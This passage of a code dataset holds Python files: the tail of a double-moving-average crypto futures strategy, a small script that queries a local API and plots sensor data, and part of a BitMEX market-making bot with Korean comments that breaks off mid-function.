self.contract_value,\n                                                             open_long_price, \"long\", open_long_amount, profit, self.total_profit, self.total_asset)\n                if cross_below:  # on a death cross\n                    if self.position.amount() == 0:\n                        price = self.market.open(-1, kline=kline)\n                        amount = round(self.total_asset / self.contract_value)\n                        info = self.exchange.sellshort(price, amount)\n                        push(info)\n                        storage.mysql_save_strategy_run_info(self.database, self.datasheet, timestamp, \"卖出开空\",\n                                                             price, amount, amount * self.contract_value, price,\n                                                             \"short\", amount, 0, self.total_profit, self.total_asset)\n                    if self.position.direction() == 'long':\n                        profit = self.position.coverlong_profit(market_type=\"usd_contract\", last=self.market.open(-1, kline=kline))  # compute the paper P&L before closing the long; the latest traded price is taken to be the open price\n                        self.total_profit += profit\n                        self.total_asset += profit\n                        cover_long_price = self.market.open(-1, kline=kline)\n                        cover_long_amount = self.position.amount()\n                        open_short_price = self.market.open(-1, kline=kline)\n                        open_short_amount = round(self.total_asset / self.contract_value)\n                        info = self.exchange.SELL(cover_long_price,\n                                                  cover_long_amount,\n                                                  open_short_price,\n                                                  open_short_amount)\n                        push(\"P&L this trade: {}  total capital now: {}\".format(profit, self.total_asset) + str(info))\n                        storage.mysql_save_strategy_run_info(self.database, self.datasheet, timestamp, \"平多开空\",\n                                                             open_short_price, open_short_amount,\n                                                             open_short_amount * self.contract_value,\n                                                             open_short_price, \"short\", open_short_amount, profit, self.total_profit,\n                                                             self.total_asset)\n            # stop-loss\n            if self.position.amount() > 0:\n                if self.position.direction() == 'long' and self.market.low(-1, kline=kline) <= self.position.price() * self.long_stop:  # long stop-loss\n                    profit = self.position.coverlong_profit(market_type=\"usd_contract\", last=self.position.price() * self.long_stop)  # compute the paper P&L before closing the long; the latest traded price is taken to be the stop price\n                    self.total_profit += profit\n                    self.total_asset += profit\n                    price = self.position.price() * self.long_stop\n                    amount = self.position.amount()\n                    info = self.exchange.sell(price, amount)\n                    push(\"P&L this trade: {}  total capital now: {}\".format(profit, self.total_asset) + str(info))\n                    storage.mysql_save_strategy_run_info(self.database, self.datasheet, timestamp,\n                                                         \"卖出止损\", price, amount,\n                                                         amount * self.contract_value,\n                                                         0, \"none\", 0, profit, self.total_profit,\n                                                         self.total_asset)\n                    self.counter += 1  # bump the counter so no further orders fire on this bar\n\n                if self.position.direction() == 'short' and self.market.high(-1, kline=kline) >= self.position.price() * self.short_stop:  # short stop-loss\n                    profit = self.position.covershort_profit(market_type=\"usd_contract\", last=self.position.price() * self.short_stop)\n                    self.total_profit += profit\n                    self.total_asset += profit\n                    price = self.position.price() * self.short_stop\n                    amount = self.position.amount()\n                    info = self.exchange.buytocover(price, amount)\n                    push(\"P&L this trade: {}  total capital now: {}\".format(profit, self.total_asset) + str(info))\n                    storage.mysql_save_strategy_run_info(self.database, self.datasheet, timestamp,\n                                                         \"买入止损\", price, amount,\n                                                         amount * self.contract_value,\n                                                         0, \"none\", 0, profit, self.total_profit,\n                                                         self.total_asset)\n                    self.counter += 1\n        except:\n            logger.info()\n\nif __name__ == \"__main__\":\n\n    # instantiate the strategy\n    instrument_id = \"EOS-USD-201225\"\n    time_frame = \"1m\"\n    strategy = Strategy(instrument_id=instrument_id, time_frame=time_frame, fast_length=5, slow_length=10, long_stop=0.98, short_stop=1.02, start_asset=30)\n\n    if config.backtest:  # backtest mode\n        print(\"Backtesting; this may take a while, please wait...\")\n        start_time = get_cur_timestamp()\n        records = []\n        data = storage.read_purequant_server_datas(instrument_id.split(\"-\")[0].lower() + \"_\" + time_frame)\n        for k in data:\n            records.append(k)\n        strategy.begin_trade(kline=records)\n        cost_time = get_cur_timestamp() - start_time\n        print(\"Backtest took {} seconds; the results were saved to the MySQL database!\".format(cost_time))\n    else:  # live mode\n        while True:  # run begin_trade in a loop\n            strategy.begin_trade()\n            sleep(3)  # sleep a few seconds to stay under the request rate limit","sub_path":"purequant/example/double_moving_average_strategy/usd_futures_double_ma_strategy.py","file_name":"usd_futures_double_ma_strategy.py","file_ext":"py","file_size_in_byte":11776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"342389082","text":"# Jessica Chen\n# 11/24/2020\n# BMW Lab\n\n\nimport pandas as pd\nimport requests\nimport json\nimport matplotlib.pyplot as plt\nimport datetime\n\n\nurl = \"http://127.0.0.1:5000/v1/resources/query/\"\n\npayload=\"{\\n    \\\"Collection\\\": \\\"IB\\\",\" \\\n        \"\\n    \\\"StartTime\\\": \\\"2020-10-01 00:00:00\\\",\" \\\n        \"\\n    \\\"EndTime\\\": \\\"2020-10-31 00:00:00\\\"\\n}\"\n\nheaders = {\n    'Content-Type': 'application/json'\n}\n\n\ndef read_data(url, payload, headers):\n    response = requests.request(\"GET\", url, headers=headers, data=payload)\n    resp_dict = json.loads(response.text)\n    resp_array = resp_dict['result']\n    data = pd.json_normalize(resp_array)\n    return data\n\n\nif __name__ == '__main__':\n    df = read_data(url, payload, headers)\n    df = df.set_index(['UploadTime'])\n    df.index = pd.to_datetime(df.index)\n    df = df.resample('60min').sum()\n    print(df)\n\n    description = df.describe().transpose()\n    print(description)\n\n    plot_cols = ['Refilling', 'Heating', 'Cooling',\n                 'HotTemp', 'TDS', 'WaterLevel', 'ColdTemp', 'WarmTemp', 'Usage_CC']\n    plot_features = df[plot_cols]\n    plot_features.index = df.index\n    _ = plot_features.plot(subplots=True)\n    plt.show()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
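Aside on the query script above: it hand-assembles the JSON payload as a string and sends it with data=. requests can serialize a dict itself via the json= keyword, which also sets the Content-Type header, so an equivalent call would be (sketch, same hypothetical local endpoint):

import requests

query = {
    "Collection": "IB",
    "StartTime": "2020-10-01 00:00:00",
    "EndTime": "2020-10-31 00:00:00",
}
response = requests.request("GET", "http://127.0.0.1:5000/v1/resources/query/", json=query)
rows = response.json()["result"]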
df[plot_cols]\n plot_features.index = df.index\n _ = plot_features.plot(subplots=True)\n plt.show()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"169204261","text":"from __future__ import absolute_import\r\nfrom time import sleep\r\nimport sys\r\nimport datetime\r\nfrom datetime import datetime\r\nfrom os.path import getmtime\r\nimport random\r\nimport requests\r\nimport atexit\r\nimport signal\r\n\r\nfrom tiki_taka_bitmex.market_maker import bitmex\r\nfrom tiki_taka_bitmex.market_maker.settings import settings\r\nfrom tiki_taka_bitmex.market_maker.utils import log, constants, errors, math\r\nfrom tiki_taka_bitmex.market_maker.utils import getCandleAvgMoveBitmex, PriceCalclater\r\n\r\n# Used for reloading the bot - saves modified times of key files\r\nimport os\r\nwatched_files_mtimes = [(f, getmtime(f)) for f in settings.WATCHED_FILES]\r\n\r\nimport time\r\nimport threading\r\nimport winsound\r\n\r\n#파싱\r\nimport urllib.request\r\nimport urllib.parse\r\nimport json\r\n\r\nLEVERAGE = PriceCalclater.LEVERAGE[0] # 레버리지\r\nRECENT_PROFIT_TIME_GAP = 12 * 60 *60#12시간\r\nCOMMISION = PriceCalclater.COMMISSION\r\nserial = settings.SERIAL\r\n\r\n#현재 정보\r\nfloatBTCPrice = 1.0#가격\r\nintBalancePosition = 0 #잔고 USB0\r\nfloatDelta = 0.0\r\nLiqPrice = 0.0 #청산가\r\nfloatProfitRate = settings.floatProfitRate# 1%상승 했을 때 팔기\r\nAVG_MOVING_RANGE = settings.AVG_MOVING_RANGE\r\nLOSS_CUT_WAITING_TIME = settings.LOSS_CUT_WAITING_TIME\r\nfloatLossCutRate = settings.floatLossCutRate\r\nBuySigned = 0 #매수 체결량\r\nSellSigned = 0 #매도 체결량\r\n\r\n#수익\r\nfloatBalanceXBT = 0.0#잔고 xbt\r\nfloatBalanceXBTFirst = 0.0#매수 전에\r\nfloatBalanceXBTSecond = 0.0#매도 후에\r\n\r\n#구동에 필요\r\nstart_state = 0 #0구동, 1일시정지, 2즉시중지 ,3팔고중지\r\nis_now_chking_profit = False #그날 익절률 계산중인지?\r\nrecent_profit_time = 0 #익절률 얻어오기\r\nrecent_process_time = 0 #작업 제대로 되고 있나요\r\nis_thread_start = False\r\nSYMBOL = settings.SYMBOL\r\nRURNNING = 0\r\nPAUSE = 1\r\nSTOP_NOW = 2\r\nSTOP_AFTER_SELL = 3\r\n\r\nis_Long = False\r\n#매매 예상\r\narrPosition = [0] * PriceCalclater.POSITION_CNT # 매수 포지션 ㅇ\r\narrWeight = [0] * PriceCalclater.POSITION_CNT # 매수 비중 ㅇ\r\narrWeightSum = [0] * PriceCalclater.POSITION_CNT # 매수 비중 합, 들어간돈\r\narrWeightRate = [0] * PriceCalclater.POSITION_CNT # 매수 비중 비율 ㅇ\r\narrAvgPosition = [0] * PriceCalclater.POSITION_CNT # 평단가 ㅇ\r\narrProfitPosition = [0] * PriceCalclater.POSITION_CNT # 이익률 가격\r\narrProfitRateReal = [0] * PriceCalclater.POSITION_CNT # 실제 청산 상승률\r\narrProfit = [0] * PriceCalclater.POSITION_CNT # 익절 대금\r\narrProfitRate = [0] * PriceCalclater.POSITION_CNT # 익절률\r\narrMargincallPosition = [0] * PriceCalclater.POSITION_CNT # 청산가격\r\narrMargincallFromNowRate = [0] * PriceCalclater.POSITION_CNT # 매수가 대비 청산가 남은 하락률\r\narrMargincallOK = [False] * PriceCalclater.POSITION_CNT # 청산가< 매수가\r\narrDecreaseRange = [0] * PriceCalclater.POSITION_CNT # 청산가 하락률\r\narrMaxRate = PriceCalclater.arrMaxRate[0]\r\n\r\nintPurchasePrice = 0 # 매수가\r\n#intPurchasePriceCnt = 0 #몇번째까지 샀는지\r\nintAvgPurchasePrice = 0 #평단\r\nintContractPosition = 0 #매수량, 매수 포지션\r\nintLastOrderPrice = 0 #최근 주문가; 청산가 보다 높아야되서\r\nintSellPrice = 0 #매도가\r\nfloatTotalProfit = 0 #이득\r\nfloatTotalProfitRate = 0 #손익률\r\nintLowPriceRate = 0 #몇퍼까지 내려갔었는지\r\nisNowTrade = False\r\nisExitImmed = False\r\nisExitNextTime = False\r\nisMarginCallActivated = False\r\nintNowBTCcnt = 0\r\nstrPurchaseTime = \"\"\r\n#---------방어코드\r\n#There will be no same price in 15 
times that means error\r\nintPriceSave = 0.0\r\nintPriceSaveCnt = 0\r\nPRICE_SAVE_CNT_LIMIT = settings.PRICE_SAVE_CNT_LIMIT\r\nis_restart = False\r\n\r\n#\r\n# Helpers\r\n#\r\n\r\nlogger = log.setup_custom_logger('root')\r\n\r\n\r\nclass ExchangeInterface:\r\n def __init__(self, dry_run=False):\r\n self.dry_run = dry_run\r\n if len(sys.argv) > 1:\r\n self.symbol = sys.argv[1]\r\n else:\r\n self.symbol = settings.SYMBOL\r\n self.bitmex = bitmex.BitMEX(base_url=settings.BASE_URL, symbol=self.symbol,\r\n apiKey=settings.API_KEY, apiSecret=settings.API_SECRET,\r\n orderIDPrefix=settings.ORDERID_PREFIX, postOnly=settings.POST_ONLY,\r\n timeout=settings.TIMEOUT)\r\n\r\n def cancel_order(self, order):\r\n tickLog = self.get_instrument()['tickLog']\r\n logger.info(\"Canceling: %s %d @ %.*f\" % (order['side'], order['orderQty'], tickLog, order['price']))\r\n while True:\r\n try:\r\n self.bitmex.cancel(order['orderID'])\r\n sleep(settings.API_REST_INTERVAL)\r\n except ValueError as e:\r\n logger.info(e)\r\n sleep(settings.API_ERROR_INTERVAL)\r\n else:\r\n break\r\n\r\n def cancel_all_orders(self):\r\n if self.dry_run:\r\n return\r\n\r\n logger.info(\"Resetting current position. Canceling all existing orders.\")\r\n tickLog = self.get_instrument()['tickLog']\r\n # print(tickLog)\r\n # In certain cases, a WS update might not make it through before we call this.\r\n # For that reason, we grab via HTTP to ensure we grab them all.\r\n orders = self.bitmex.http_open_orders()\r\n # print(orders)\r\n for order in orders:\r\n logger.info(\"Canceling: %s %d @ %.*f\" % (order['side'], order['orderQty'], tickLog, order['price']))\r\n\r\n if len(orders):\r\n self.bitmex.cancel([order['orderID'] for order in orders])\r\n\r\n sleep(settings.API_REST_INTERVAL)\r\n\r\n def get_portfolio(self):\r\n contracts = settings.CONTRACTS\r\n portfolio = {}\r\n for symbol in contracts:\r\n position = self.bitmex.position(symbol=symbol)\r\n instrument = self.bitmex.instrument(symbol=symbol)\r\n\r\n if instrument['isQuanto']:\r\n future_type = \"Quanto\"\r\n elif instrument['isInverse']:\r\n future_type = \"Inverse\"\r\n elif not instrument['isQuanto'] and not instrument['isInverse']:\r\n future_type = \"Linear\"\r\n else:\r\n raise NotImplementedError(\"Unknown future type; not quanto or inverse: %s\" % instrument['symbol'])\r\n\r\n if instrument['underlyingToSettleMultiplier'] is None:\r\n multiplier = float(instrument['multiplier']) / float(instrument['quoteToSettleMultiplier'])\r\n else:\r\n multiplier = float(instrument['multiplier']) / float(instrument['underlyingToSettleMultiplier'])\r\n\r\n portfolio[symbol] = {\r\n \"currentQty\": float(position['currentQty']),\r\n \"futureType\": future_type,\r\n \"multiplier\": multiplier,\r\n \"markPrice\": float(instrument['markPrice']),\r\n \"spot\": float(instrument['indicativeSettlePrice'])\r\n }\r\n\r\n return portfolio\r\n\r\n def calc_delta(self):\r\n \"\"\"Calculate currency delta for portfolio\"\"\"\r\n portfolio = self.get_portfolio()\r\n spot_delta = 0\r\n mark_delta = 0\r\n for symbol in portfolio:\r\n item = portfolio[symbol]\r\n if item['futureType'] == \"Quanto\":\r\n spot_delta += item['currentQty'] * item['multiplier'] * item['spot']\r\n mark_delta += item['currentQty'] * item['multiplier'] * item['markPrice']\r\n elif item['futureType'] == \"Inverse\":\r\n spot_delta += (item['multiplier'] / item['spot']) * item['currentQty']\r\n mark_delta += (item['multiplier'] / item['markPrice']) * item['currentQty']\r\n elif item['futureType'] == \"Linear\":\r\n spot_delta += 
item['multiplier'] * item['currentQty']\r\n mark_delta += item['multiplier'] * item['currentQty']\r\n basis_delta = mark_delta - spot_delta\r\n delta = {\r\n \"spot\": spot_delta,\r\n \"mark_price\": mark_delta,\r\n \"basis\": basis_delta\r\n }\r\n return delta\r\n\r\n def get_delta(self, symbol=None):\r\n if symbol is None:\r\n symbol = self.symbol\r\n return self.get_position(symbol)['currentQty']\r\n\r\n def get_instrument(self, symbol=None):\r\n if symbol is None:\r\n symbol = self.symbol\r\n return self.bitmex.instrument(symbol)\r\n\r\n def get_margin(self):\r\n if self.dry_run:\r\n return {'marginBalance': float(settings.DRY_BTC), 'availableFunds': float(settings.DRY_BTC)}\r\n return self.bitmex.funds()\r\n\r\n def get_orders(self):\r\n if self.dry_run:\r\n return []\r\n return self.bitmex.open_orders()\r\n\r\n def get_highest_buy(self):\r\n buys = [o for o in self.get_orders() if o['side'] == 'Buy']\r\n if not len(buys):\r\n return {'price': -2**32}\r\n highest_buy = max(buys or [], key=lambda o: o['price'])\r\n return highest_buy if highest_buy else {'price': -2**32}\r\n\r\n def get_lowest_sell(self):\r\n sells = [o for o in self.get_orders() if o['side'] == 'Sell']\r\n if not len(sells):\r\n return {'price': 2**32}\r\n lowest_sell = min(sells or [], key=lambda o: o['price'])\r\n return lowest_sell if lowest_sell else {'price': 2**32} # ought to be enough for anyone\r\n\r\n def get_position(self, symbol=None):\r\n if symbol is None:\r\n symbol = self.symbol\r\n return self.bitmex.position(symbol)\r\n\r\n def get_ticker(self, symbol=None):\r\n if symbol is None:\r\n symbol = self.symbol\r\n return self.bitmex.ticker_data(symbol)\r\n\r\n def is_open(self):\r\n \"\"\"Check that websockets are still open.\"\"\"\r\n return not self.bitmex.ws.exited\r\n\r\n def check_market_open(self):\r\n instrument = self.get_instrument()\r\n if instrument[\"state\"] != \"Open\" and instrument[\"state\"] != \"Closed\":\r\n raise errors.MarketClosedError(\"The instrument %s is not open. State: %s\" %\r\n (self.symbol, instrument[\"state\"]))\r\n\r\n def check_if_orderbook_empty(self):\r\n \"\"\"This function checks whether the order book is empty\"\"\"\r\n instrument = self.get_instrument()\r\n if instrument['midPrice'] is None:\r\n raise errors.MarketEmptyError(\"Orderbook is empty, cannot quote\")\r\n\r\n def amend_bulk_orders(self, orders):\r\n if self.dry_run:\r\n return orders\r\n return self.bitmex.amend_bulk_orders(orders)\r\n\r\n def create_bulk_orders(self, orders):\r\n if self.dry_run:\r\n return orders\r\n return self.bitmex.create_bulk_orders(orders)\r\n\r\n def cancel_bulk_orders(self, orders):\r\n if self.dry_run:\r\n return orders\r\n return self.bitmex.cancel([order['orderID'] for order in orders])\r\n\r\n#######################################내가짠코딩###########################################\r\n def update_margin(self, syb, leverage):\r\n return self.bitmex.isolate_margin(syb, leverage)\r\n\r\nclass OrderManager:\r\n def __init__(self):\r\n self.exchange = ExchangeInterface(settings.DRY_RUN)\r\n # Once exchange is created, register exit handler that will always cancel orders\r\n # on any error.\r\n atexit.register(self.exit)\r\n signal.signal(signal.SIGTERM, self.exit)\r\n\r\n logger.info(\"Using symbol %s.\" % self.exchange.symbol)\r\n\r\n if settings.DRY_RUN:\r\n logger.info(\"Initializing dry run. Orders printed below represent what would be posted to BitMEX.\")\r\n else:\r\n logger.info(\"Order Manager initializing, connecting to BitMEX. 
Live run: executing real trades.\")\r\n\r\n        self.start_time = datetime.now()\r\n        self.instrument = self.exchange.get_instrument()\r\n        self.starting_qty = self.exchange.get_delta()\r\n        self.running_qty = self.starting_qty\r\n        self.reset()\r\n\r\n    def reset(self):\r\n        self.exchange.cancel_all_orders()\r\n        self.sanity_check()\r\n        self.print_status()\r\n\r\n        # Create orders and converge.\r\n        # self.place_orders()\r\n\r\n    def print_status(self):\r\n        print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n        global floatBTCPrice, intBalancePosition, floatBalanceXBT, isNowTrade, intContractPosition, intAvgPurchasePrice, floatDelta, floatTotalProfit, floatTotalProfitRate, LiqPrice\r\n        \"\"\"Print the current MM status.\"\"\"\r\n\r\n        margin = self.exchange.get_margin()\r\n        position = self.exchange.get_position()\r\n        self.running_qty = self.exchange.get_delta()\r\n        tickLog = self.exchange.get_instrument()['tickLog']\r\n        self.start_XBt = margin[\"marginBalance\"]\r\n        floatDelta = abs(round(float(self.exchange.calc_delta()['spot']), 5))\r\n        intBalancePosition = int((float(XBt_to_XBT(self.start_XBt)) * floatBTCPrice))\r\n        floatBalanceXBT = abs(round(float(XBt_to_XBT(self.start_XBt)), 6))\r\n\r\n        print('//////////////////////////////////////////////////////////////')\r\n        print('////■■■//■//■//■//■///■■■///■////■//■/////■/////////')\r\n        print('//////■////■//■■////■/////■///■/■///■■/////■/■///////')\r\n        print('//////■////■//■//■//■/////■//■///■//■//■//■///■//////')\r\n        print('//////////////////////////////////////////////////////////////')\r\n        now = datetime.now()\r\n        time_ = now.strftime('%Y-%m-%d %H:%M:%S')\r\n        if is_Long:\r\n            print(time_, 'Long order')\r\n        else:\r\n            print(time_, 'Short order')\r\n        print('Purchase time', strPurchaseTime[:16])\r\n        print('XBT Balance', XBt_to_XBT(self.start_XBt))\r\n        print('Contract Position $', self.running_qty, '')\r\n        print('LEVERAGE ', LEVERAGE, 'x')\r\n        # logger.info(\"Current XBT Balance: %.6f\" % XBt_to_XBT(self.start_XBt))\r\n        # logger.info(\"Current Contract Position: %d\" % self.running_qty)\r\n        if (type(position['avgCostPrice']) is int or type(position['avgCostPrice']) is float) and position['avgCostPrice'] > 0:\r\n            # logger.info(\"Position limits: %d/%d\" % (settings.MIN_POSITION, settings.MAX_POSITION))\r\n            isNowTrade = True\r\n            intAvgPurchasePrice = round(float(position['avgCostPrice']), 2)\r\n            intContractPosition = self.running_qty\r\n            LiqPrice = float(position['liquidationPrice'])\r\n            rate = 0\r\n\r\n            if intSellPrice > 0:\r\n                rate = round(abs(intAvgPurchasePrice - intSellPrice) / intAvgPurchasePrice * 100, 2)\r\n            print('Liquidation Price', float(LiqPrice))\r\n            print('Avg Cost Price', float(position['avgCostPrice']))\r\n            print()\r\n            print('Current BTC Price', float(floatBTCPrice))\r\n            if intSellPrice > 0:\r\n                print('Avg', float(position['avgCostPrice']), '-> Sell', float(intSellPrice), '', float(rate), '% profit target')\r\n            if is_Long:\r\n                now_rate = -round(((intAvgPurchasePrice - floatBTCPrice) / intAvgPurchasePrice) * 100 - COMMISION, 2)\r\n            else:\r\n                now_rate = round(((intAvgPurchasePrice - floatBTCPrice) / intAvgPurchasePrice) * 100 + COMMISION, 2)\r\n            print('Current profit rate', float(now_rate), '%')\r\n            # logger.info(\"LiqPrice Price: %d\" % float(LiqPrice))\r\n            # logger.info(\"Avg Cost Price: %.*f\" % (tickLog, float(position['avgCostPrice'])))\r\n            # logger.info(\"Avg Entry Price: %.*f\" % (tickLog, float(position['avgEntryPrice'])))\r\n            # logger.info(\"Avg: %d -> Sell : $d, %.2f per\" % (float(LiqPrice), float(intSellPrice), float(rate)))\r\n            # logger.info(\"Now Margin: %.2f per\" % float(now_rate))\r\n            # logger.info(\"LiqPrice Price: %d\" % float(LiqPrice))\r\n
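            # worked example (sketch, illustrative numbers): long at avg 10000 and price 10100\r\n            # -> now_rate = (10100 - 10000) / 10000 * 100 + COMMISION = 1.0 + COMMISION percent\r\n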
        else:\r\n            isNowTrade = False\r\n        print('Contracts Traded This Run', (self.running_qty - self.starting_qty))\r\n        print('Total Contract Delta XBT', round(self.exchange.calc_delta()['spot'], 6))\r\n        # logger.info(\"Contracts Traded This Run: %d\" % (self.running_qty - self.starting_qty))\r\n        # logger.info(\"Total Contract Delta: %.4f XBT\" % self.exchange.calc_delta()['spot'])\r\n        print('///////////////////////////////////////////////////////////')\r\n        print('///////////////////////////////////////////////////////////')\r\n\r\n\r\n        if floatTotalProfit != 0 and not is_sell and float(self.exchange.calc_delta()['spot']) == 0:\r\n            self.sendProfit() # send the profit report\r\n            sleep(60)\r\n\r\n            floatTotalProfit = 0 # profit\r\n\r\n    def get_ticker(self):\r\n        global start_position_buy, start_position_sell\r\n        ticker = self.exchange.get_ticker()\r\n        tickLog = self.exchange.get_instrument()['tickLog']\r\n\r\n        # Set up our buy & sell positions as the smallest possible unit above and below the current spread\r\n        # and we'll work out from there. That way we always have the best price but we don't kill wide\r\n        # and potentially profitable spreads.\r\n        start_position_buy = self.start_position_buy = ticker[\"buy\"] + self.instrument['tickSize']\r\n        start_position_sell = self.start_position_sell = ticker[\"sell\"] - self.instrument['tickSize']\r\n\r\n        # If we're maintaining spreads and we already have orders in place,\r\n        # make sure they're not ours. If they are, we need to adjust, otherwise we'll\r\n        # just work the orders inward until they collide.\r\n        if settings.MAINTAIN_SPREADS:\r\n            if ticker['buy'] == self.exchange.get_highest_buy()['price']:\r\n                self.start_position_buy = ticker[\"buy\"]\r\n            if ticker['sell'] == self.exchange.get_lowest_sell()['price']:\r\n                self.start_position_sell = ticker[\"sell\"]\r\n\r\n        # Back off if our spread is too small.\r\n        if self.start_position_buy * (1.00 + settings.MIN_SPREAD) > self.start_position_sell:\r\n            self.start_position_buy *= (1.00 - (settings.MIN_SPREAD / 2))\r\n            self.start_position_sell *= (1.00 + (settings.MIN_SPREAD / 2))\r\n\r\n        # Midpoint, used for simpler order placement.\r\n        self.start_position_mid = ticker[\"mid\"]\r\n        # logger.info(\r\n        #     \"%s Ticker: Buy: %.*f, Sell: %.*f\" %\r\n        #     (self.instrument['symbol'], tickLog, ticker[\"buy\"], tickLog, ticker[\"sell\"])\r\n        # )\r\n        # logger.info('Start Positions: Buy: %.*f, Sell: %.*f, Mid: %.*f' %\r\n        #             (tickLog, self.start_position_buy, tickLog, self.start_position_sell,\r\n        #              tickLog, self.start_position_mid))\r\n        return ticker\r\n\r\n    ###\r\n    # Position Limits\r\n    ###\r\n    def converge_orders(self, buy_orders, sell_orders):\r\n        \"\"\"Converge the orders we currently have in the book with what we want to be in the book.\r\n        This involves amending any open orders and creating new ones if any have filled completely.\r\n        We start from the closest orders outward.\"\"\"\r\n\r\n        tickLog = self.exchange.get_instrument()['tickLog']\r\n        to_amend = []\r\n        to_create = []\r\n        to_cancel = []\r\n        buys_matched = 0\r\n        sells_matched = 0\r\n        existing_orders = self.exchange.get_orders()\r\n\r\n        # Check all existing orders and match them up with what we want to place.\r\n        # If there's an open one, we might be able to amend it to fit what we want.\r\n        naver_touch_order = 2 # 0-buy 1-sell 2-nothing\r\n        if len(buy_orders) > 0 and type(buy_orders[0]) is int and buy_orders[0] == 
1234567:\r\n buy_orders = []\r\n naver_touch_order = 0\r\n if len(sell_orders) > 0 and type(sell_orders[0]) is int and sell_orders[0] == 1234567:\r\n sell_orders = []\r\n naver_touch_order = 1\r\n\r\n for order in existing_orders:\r\n try:\r\n if order['side'] == 'Buy':\r\n desired_order = buy_orders[buys_matched]\r\n buys_matched += 1\r\n else:\r\n desired_order = sell_orders[sells_matched]\r\n sells_matched += 1\r\n\r\n # Found an existing order. Do we need to amend it?\r\n if desired_order['orderQty'] != order['leavesQty'] or (\r\n # If price has changed, and the change is more than our RELIST_INTERVAL, amend.\r\n desired_order['price'] != order['price'] and\r\n abs((desired_order['price'] / order['price']) - 1) > settings.RELIST_INTERVAL):\r\n to_amend.append({'orderID': order['orderID'], 'orderQty': order['cumQty'] + desired_order['orderQty'],\r\n 'price': desired_order['price'], 'side': order['side']})\r\n except IndexError:\r\n # Will throw if there isn't a desired order to match. In that case, cancel it.\r\n if order['side'] == 'Buy' and naver_touch_order != 0:\r\n to_cancel.append(order)\r\n if order['side'] == 'Sell' and naver_touch_order != 1:\r\n to_cancel.append(order)\r\n\r\n\r\n while buys_matched < len(buy_orders):\r\n to_create.append(buy_orders[buys_matched])\r\n buys_matched += 1\r\n\r\n while sells_matched < len(sell_orders):\r\n to_create.append(sell_orders[sells_matched])\r\n sells_matched += 1\r\n\r\n if len(to_amend) > 0:\r\n for amended_order in reversed(to_amend):\r\n reference_order = [o for o in existing_orders if o['orderID'] == amended_order['orderID']][0]\r\n logger.info(\"Amending %4s: %d @ %.*f to %d @ %.*f (%+.*f)\" % (\r\n amended_order['side'],\r\n reference_order['leavesQty'], tickLog, reference_order['price'],\r\n (amended_order['orderQty'] - reference_order['cumQty']), tickLog, amended_order['price'],\r\n tickLog, (amended_order['price'] - reference_order['price'])\r\n ))\r\n # This can fail if an order has closed in the time we were processing.\r\n # The API will send us `invalid ordStatus`, which means that the order's status (Filled/Canceled)\r\n # made it not amendable.\r\n # If that happens, we need to catch it and re-tick.\r\n try:\r\n self.exchange.amend_bulk_orders(to_amend)\r\n except requests.exceptions.HTTPError as e:\r\n errorObj = e.response.json()\r\n if errorObj['error']['message'] == 'Invalid ordStatus':\r\n logger.warn(\"Amending failed. Waiting for order data to converge and retrying.\")\r\n sleep(0.5)\r\n return self.run_loop()\r\n else:\r\n logger.error(\"Unknown error on amend: %s. 
Exiting\" % errorObj)\r\n sys.exit(1)\r\n\r\n if len(to_create) > 0:\r\n logger.info(\"Creating %d orders:\" % (len(to_create)))\r\n for order in reversed(to_create):\r\n logger.info(\"%4s %d @ %.*f\" % (order['side'], order['orderQty'], tickLog, order['price']))\r\n self.exchange.create_bulk_orders(to_create)\r\n\r\n # Could happen if we exceed a delta limit\r\n if len(to_cancel) > 0:\r\n logger.info(\"Canceling %d orders:\" % (len(to_cancel)))\r\n for order in reversed(to_cancel):\r\n logger.info(\"%4s %d @ %.*f\" % (order['side'], order['leavesQty'], tickLog, order['price']))\r\n self.exchange.cancel_bulk_orders(to_cancel)\r\n def short_position_limit_exceeded(self):\r\n \"\"\"Returns True if the short position limit is exceeded\"\"\"\r\n if not settings.CHECK_POSITION_LIMITS:\r\n return False\r\n position = self.exchange.get_delta()\r\n return position <= settings.MIN_POSITION\r\n\r\n def long_position_limit_exceeded(self):\r\n \"\"\"Returns True if the long position limit is exceeded\"\"\"\r\n if not settings.CHECK_POSITION_LIMITS:\r\n return False\r\n position = self.exchange.get_delta()\r\n return position >= settings.MAX_POSITION\r\n\r\n ###\r\n # Sanity\r\n ##\r\n\r\n def sanity_check(self):\r\n print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n global floatBTCPrice\r\n # Check if OB is empty - if so, can't quote.\r\n self.exchange.check_if_orderbook_empty()\r\n\r\n # Ensure market is still open.\r\n self.exchange.check_market_open()\r\n\r\n # Get ticker, which sets price offsets and prints some debugging info.\r\n ticker = self.get_ticker() #Price info\r\n\r\n floatBTCPrice = float(ticker[\"buy\"]) # 현재가\r\n\r\n\r\n def check_file_change(self):\r\n \"\"\"Restart if any files we're watching have changed.\"\"\"\r\n for f, mtime in watched_files_mtimes:\r\n if getmtime(f) > mtime:\r\n self.restart()\r\n\r\n def check_connection(self):\r\n \"\"\"Ensure the WS connections are still open.\"\"\"\r\n return self.exchange.is_open()\r\n\r\n def exit(self):\r\n logger.info(\"Shutting down. 
All open orders will be cancelled.\")\r\n        try:\r\n            # self.exchange.cancel_all_orders()\r\n            self.exchange.bitmex.exit()\r\n        except errors.AuthenticationError as e:\r\n            logger.info(\"Was not authenticated; could not cancel orders.\")\r\n        except Exception as e:\r\n            logger.info(\"Unable to cancel orders: %s\" % e)\r\n        self.restart()\r\n        # sys.exit()\r\n\r\n\r\n    ##################################### my own code ######################################\r\n\r\n    def get_order_success(self):\r\n        # wait until the buy order has actually filled\r\n        global intAvgPurchasePrice, floatBalanceXBTFirst, strPurchaseTime, is_Long, intContractPosition\r\n        floatBalanceXBTFirst = floatBalanceXBT # XBT balance before buying\r\n        # print('intContractPosition', intContractPosition)\r\n        if intContractPosition < 0:\r\n            is_Long = False\r\n            print('Short Position')\r\n        if intContractPosition > 0:\r\n            is_Long = True\r\n            print('Long Position')\r\n\r\n\r\n        for a in range(10):\r\n            sleep(7)\r\n            position = self.exchange.get_position()\r\n            